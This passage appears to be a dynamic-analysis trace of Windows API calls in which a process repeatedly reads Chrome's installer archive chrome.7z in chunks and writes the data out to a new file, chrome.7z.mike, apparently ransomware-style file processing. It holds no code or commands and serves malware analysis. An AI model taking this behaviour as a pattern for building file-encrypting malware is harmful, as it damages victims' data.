(x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.387] GetFileType (hFile=0x1c8) returned 0x1 [0179.387] GetFileType (hFile=0x1c8) returned 0x1 [0179.388] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46c8220 [0179.388] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.388] GetFileType (hFile=0x1c8) returned 0x1 [0179.389] GetFileType (hFile=0x1c8) returned 0x1 [0179.389] ReadFile (in: hFile=0x1c8, lpBuffer=0x22a0b30, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x22a0b30*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.390] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.390] GetFileType (hFile=0x1c8) returned 0x1 [0179.391] GetFileType (hFile=0x1c8) returned 0x1 [0179.391] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46caa20 [0179.391] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.392] GetFileType (hFile=0x1c8) returned 0x1 [0179.392] GetFileType (hFile=0x1c8) returned 0x1 [0179.392] ReadFile (in: hFile=0x1c8, lpBuffer=0x22adb18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x22adb18*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.393] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.393] GetFileType (hFile=0x1c8) returned 0x1 [0179.394] GetFileType (hFile=0x1c8) returned 0x1 [0179.394] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46cd220 [0179.394] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.395] GetFileType (hFile=0x1c8) returned 0x1 [0179.395] GetFileType (hFile=0x1c8) returned 0x1 [0179.395] ReadFile (in: hFile=0x1c8, lpBuffer=0x22bab00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x22bab00*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.397] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.397] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.397] GetFileType (hFile=0x1c8) returned 0x1 [0179.397] GetFileType (hFile=0x1c8) returned 0x1 [0179.398] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46cfa20 [0179.398] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.398] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.398] GetFileType (hFile=0x1c8) returned 0x1 [0179.399] GetFileType (hFile=0x1c8) returned 0x1 [0179.399] ReadFile (in: hFile=0x1c8, lpBuffer=0x22c7ae8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x22c7ae8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.400] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.400] GetFileType (hFile=0x1c8) returned 0x1 [0179.401] GetFileType (hFile=0x1c8) returned 0x1 [0179.401] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46d2220 [0179.401] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.401] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.402] GetFileType (hFile=0x1c8) returned 0x1 [0179.402] GetFileType (hFile=0x1c8) returned 0x1 [0179.402] ReadFile (in: hFile=0x1c8, lpBuffer=0x22d4ad0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x22d4ad0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.403] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.403] GetFileType (hFile=0x1c8) returned 0x1 [0179.404] GetFileType (hFile=0x1c8) returned 0x1 [0179.404] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46d4a20 [0179.404] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.404] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.405] GetFileType (hFile=0x1c8) returned 0x1 [0179.405] GetFileType (hFile=0x1c8) returned 0x1 [0179.405] ReadFile (in: hFile=0x1c8, lpBuffer=0x22e1ab8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x22e1ab8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.406] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.407] GetFileType (hFile=0x1c8) returned 0x1 [0179.407] GetFileType (hFile=0x1c8) returned 0x1 [0179.407] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46d7220 [0179.407] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.408] GetFileType (hFile=0x1c8) returned 0x1 [0179.408] GetFileType (hFile=0x1c8) returned 0x1 [0179.408] ReadFile (in: hFile=0x1c8, lpBuffer=0x22eeaa0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x22eeaa0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.409] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.410] GetFileType (hFile=0x1c8) returned 0x1 [0179.410] GetFileType (hFile=0x1c8) returned 0x1 [0179.410] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46d9a20 [0179.411] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.411] GetFileType (hFile=0x1c8) returned 0x1 [0179.411] GetFileType (hFile=0x1c8) returned 0x1 [0179.411] ReadFile (in: hFile=0x1c8, lpBuffer=0x22fba88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x22fba88*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.414] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.414] GetFileType (hFile=0x1c8) returned 0x1 [0179.414] GetFileType (hFile=0x1c8) returned 0x1 [0179.414] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46dc220 [0179.415] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.415] GetFileType (hFile=0x1c8) returned 0x1 [0179.416] GetFileType (hFile=0x1c8) returned 0x1 [0179.416] ReadFile (in: hFile=0x1c8, lpBuffer=0x2108cf0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2108cf0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.417] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.417] GetFileType (hFile=0x1c8) returned 0x1 [0179.417] GetFileType (hFile=0x1c8) returned 0x1 [0179.417] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46dea20 [0179.418] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.418] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.419] GetFileType (hFile=0x1c8) returned 0x1 [0179.419] GetFileType (hFile=0x1c8) returned 0x1 [0179.419] ReadFile (in: hFile=0x1c8, lpBuffer=0x2115cd8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2115cd8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.420] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.420] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.420] GetFileType (hFile=0x1c8) returned 0x1 [0179.421] GetFileType (hFile=0x1c8) returned 0x1 [0179.421] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46e1220 [0179.421] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.421] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.422] GetFileType (hFile=0x1c8) returned 0x1 [0179.422] GetFileType (hFile=0x1c8) returned 0x1 [0179.422] ReadFile (in: hFile=0x1c8, lpBuffer=0x2122cc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2122cc0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.423] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.423] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.424] GetFileType (hFile=0x1c8) returned 0x1 [0179.424] GetFileType (hFile=0x1c8) returned 0x1 [0179.424] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46e3a20 [0179.424] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.425] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.425] GetFileType (hFile=0x1c8) returned 0x1 [0179.425] GetFileType (hFile=0x1c8) returned 0x1 [0179.425] ReadFile (in: hFile=0x1c8, lpBuffer=0x212fca8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x212fca8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.426] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.426] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.427] GetFileType (hFile=0x1c8) returned 0x1 [0179.427] GetFileType (hFile=0x1c8) returned 0x1 [0179.427] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46e6220 [0179.427] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.428] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 